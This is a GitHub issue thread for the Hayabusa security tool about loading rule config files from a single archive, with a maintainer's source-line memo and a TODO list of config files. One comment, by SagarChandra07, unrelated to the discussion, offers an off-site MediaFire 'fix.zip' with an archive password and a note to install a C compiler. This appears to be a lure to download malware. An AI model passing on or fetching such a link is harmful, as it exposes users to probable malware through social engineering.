### ISSUE TITLE
Load config files from a single file

### ISSUE THREAD

**Issue by YamatoSecurity** [Yamato-Security/hayabusa#1420]
We are still going to keep support for the config files under `rules/config` to make it easy to edit those files but will also support loading those config files from a single file. This is will implemented after https://github.com/Yamato-Security/hayabusa-encoded-rules/issues/2 is implemented. It will probably be a single `rules_config.zip` file in the root of the Hayabusa folder.

Note: that this config files should also be updated when `update-rules` is ran

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by fukusuket** [comment]
memo:

### txt
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L306
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L331
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L585
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L605
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L619
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L632
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L657
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L670

### yml
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L494
- https://github.com/Yamato-Security/hayabusa/blob/main/src/detections/configs.rs#L246

**Comment by fukusuket** [comment]
### TODO

- [ ] channel_abbreviations.txt
- [ ] channel_eid_info.txt
- [ ] default_details.txt
- [ ] event_id_info.txt
- [ ] eventkey_alias.txt
- [ ] exclude_rules.txt
- [ ] generic_abbreviations.txt
- [ ] level_tuning.txt
- [ ] noisy_rules.txt
- [ ] pivot_keywords.txt
- [ ] proven_rules.txt
- [ ] provider_abbreviations.txt
- [ ] target_event_IDs.txt
- [ ] data_mapping
- [ ] geoip_field_mapping.yaml
